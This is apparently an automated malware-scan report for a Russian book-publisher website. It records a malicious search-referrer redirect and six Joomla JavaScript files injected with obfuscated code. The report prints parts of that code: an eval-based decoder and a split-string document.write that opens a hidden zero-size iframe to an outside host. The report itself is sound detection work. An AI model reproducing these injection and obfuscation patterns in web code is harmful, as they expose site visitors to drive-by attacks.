New scan:

Malware Scanner report for ling-kniga.ru

Malicious/Suspicious/Total urls checked
6/0/15
6 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://tinyurl.com/c2td3xs
195 websites infected.

The website "ling-kniga.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.ling-kniga.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: www.ling-kniga.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sat, 20 Sep 2014 00:59:34 GMT
Location: http://tinyurl.com/c2td3xs
Server: Jino.ru/mod_pizza
Content-Length: 89
Content-Type: text/html
Set-Cookie: _cutt_caches_images=1411174774; expires=Sun, 21-Sep-2014 00:59:34 GMT; path=/
malicious

Scanned pages/files

RequestServer responseStatus
http://www.ling-kniga.ru/
200 OK
Content-Length: 24020
Content-Type: text/html
clean
http://www.ling-kniga.ru/media/system/js/caption.js
200 OK
Content-Length: 12142
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 3237 bytes are skipped ...
else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));
document.write('<iframe src="'+'ht'+'tp://ibs'+'encoa'+'c'+'h'+'ing.dk/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ad-Aware
Trojan.JS.Agent.JAB
Ikarus
Trojan.JS.Redirector
Rising
JS:Malware.JCrypto!1.9BF9
nProtect
Trojan.JS.Agent.JAB
K7AntiVirus
Trojan ( 91ee82b70 )
Emsisoft
Trojan.JS.Agent.JAB (B)
Comodo
TrojWare.JS.Agent.TC
K7GW
Exploit ( 04c553061 )
DrWeb
JS.Redirector.188
MicroWorld-eScan
Trojan.JS.Agent.JAB
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Secure
Trojan.JS.Agent.JAB
F-Prot
JS/Redir.SA
AVG
HTML/Framer
Norman
ShellCode.V
GData
Trojan.JS.Agent.JAB
Commtouch
JS/Redir.SA
ESET-NOD32
JS/Redirector.NJG
BitDefender
Trojan.JS.Agent.JAB

http://www.ling-kniga.ru/modules/mod_jaslideshow2/assets/script.js
200 OK
Content-Length: 29355
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



Element.Events.extend({
'wheelup': {
type: Element.Events.mousewheel.type,
map: function(event){
event = new Event(event);
if (event.wheel >= 0) this.fireEvent('wheelup', event)
}
},
'wheeldown': {
type: Element.Events.mousewheel.type,
map: function(event){
event = new Event(event);
if (event.wheel <= 0) this.fireEvent('wheeldown', event)
}
}
});

var JASlideshowThre
... 3354 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
Comodo
TrojWare.JS.Agent.TC
F-Prot
JS/IFrame.SJ.gen
Commtouch
JS/IFrame.SJ.gen

http://www.ling-kniga.ru/plugins/content/ja_tabs/ja_tabs.js
200 OK
Content-Length: 24128
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)


var wrap_W = 0;
var JATabs = new Class({
initialize: function(element, options) {
this.options = Object.extend({
position: 'top',
width: '100%',
height: 'auto',
skipAnim: false,
animType: 'animMoveHor',
mouseType: 'mouseover',
changeTransition: Fx.Transitions.Pow.easeIn,
duration: 1000,
mouseOverClass: 'hover',
activateOnLoad: 'first',
useAjax: false,
ajax
... 3331 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ad-Aware
Trojan.JS.Redirector.BOQ
Ikarus
Trojan.JS.Redirector
Rising
JS:Malware.JCrypto!1.9BF9
nProtect
Trojan.JS.Redirector.BOQ
K7AntiVirus
Exploit ( 04c553061 )
Comodo
TrojWare.JS.Agent.TC
Emsisoft
Trojan.JS.Redirector.BOQ (B)
K7GW
Exploit ( 04c553061 )
McAfee-GW-Edition
JS/Redirector.bp
DrWeb
JS.Redirector.188
Microsoft
Trojan:JS/Redirector.MK
Kaspersky
Trojan.JS.Redirector.zb
MicroWorld-eScan
Trojan.JS.Redirector.BOQ
Fortinet
JS/Redirector.NJI!tr
McAfee
JS/Redirector.bp
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Secure
Trojan.JS.Redirector.BOQ
VIPRE
Trojan.JS.Redirector.mk (v)
F-Prot
JS/Redir.SA
AVG
HTML/Framer
Norman
Redirector.JF
Sophos
Troj/JSRedir-JN
GData
Trojan.JS.Redirector.BOQ
Commtouch
JS/Redir.SA
ESET-NOD32
JS/Redirector.NJG
BitDefender
Trojan.JS.Redirector.BOQ

http://www.ling-kniga.ru/templates/ja_nickel/js/ja.script.js
200 OK
Content-Length: 22693
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)


function switchFontSize (ckname,val){
var bd = $E('body');
switch (val) {
case 'inc':
if (CurrentFontSize+1 < 7) {
bd.removeClass('fs'+CurrentFontSize);
CurrentFontSize++;
bd.addClass('fs'+CurrentFontSize);
}
break;
case 'dec':
if (CurrentFontSize-1 > 0) {
bd.removeClass('fs'+CurrentFontSize);
CurrentFontSize--;
bd.addClass('fs'+CurrentFontSize);
}
break;
default
... 3395 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

K7AntiVirus
Riskware
Comodo
TrojWare.JS.Agent.TC
F-Prot
JS/IFrame.SJ.gen
Sophos
Troj/JSRedir-JN
Commtouch
JS/IFrame.SJ.gen

http://www.ling-kniga.ru/templates/ja_nickel/ja_menus/ja_cssmenu/ja.cssmenu.js
200 OK
Content-Length: 11160
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



sfHover = function() {
var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li");
for (var i=0; i<sfEls.length; ++i) {
sfEls[i].onmouseover=function() {
clearTimeout(this.timer);
if(this.className.indexOf("sfhover") == -1)
this.className+="sfhover";
}
sfEls[i].onmouseout=function() {
this.timer = setTimeout(sfHoverOut.bind(this), 20);
}
}
}

function sfHoverOut() {
... 3141 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
Comodo
TrojWare.JS.Agent.TC
F-Prot
JS/IFrame.SJ.gen
Norman
ShellCode.V
Commtouch
JS/IFrame.SJ.gen

http://www.ling-kniga.ru/index.php
200 OK
Content-Length: 24038
Content-Type: text/html
clean
http://www.ling-kniga.ru/index.php/o-kompanii.html
200 OK
Content-Length: 13611
Content-Type: text/html
clean
http://www.ling-kniga.ru/index.php/o-kompanii.html/o-kompanii.html
404 Not Found
Content-Length: 1850
Content-Type: text/html
clean
http://www.ling-kniga.ru/test404page.js
404 Not Found
Content-Length: 1734
Content-Type: text/html
clean
http://www.ling-kniga.ru/index.php/news.html
200 OK
Content-Length: 17213
Content-Type: text/html
clean
http://www.ling-kniga.ru/plugins/content/mavikthumbnails/slimbox-mt1.1/js/slimbox.js
200 OK
Content-Length: 14480
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Slimbox=(function(){var G=window,v,h,H=-1,q,x,F,w,z,N,t,l=r.bindWithEvent(),f=window.opera&&(navigator.appVersion>="9.3"),p=document.documentElement,o={},u=new Image(),L=new Image(),J,b,i,K,e,I,c,B,M,y,j,d,D;G.addEvent("domready",function(){$(document.body).adopt($$(J=new Element("div",{id:"lbOverlay"}),b=new Element("div",{id:"lbCenter"}),I=new Element("div",{id:"lbBottomContainer"})).setStyle("display","none"));i=new Element("div",{id:"lbImage"}).injectInside(b).adopt(K=new Elem
... 3076 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
K7AntiVirus
Riskware
Comodo
TrojWare.JS.Agent.TC
F-Prot
JS/IFrame.SJ.gen
Norman
Crypt.BJLS
Commtouch
JS/IFrame.SJ.gen

http://www.ling-kniga.ru/index.php/news.html/news.html
404 Not Found
Content-Length: 1850
Content-Type: text/html
clean
http://www.ling-kniga.ru/index.php/
200 OK
Content-Length: 24040
Content-Type: text/html
clean
http://www.ling-kniga.ru/index.php/sotrudnihestvo/avtory.html
200 OK
Content-Length: 14457
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ling-kniga.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ling-kniga.ru/

Result: ling-kniga.ru is not infected or malware details are not published yet.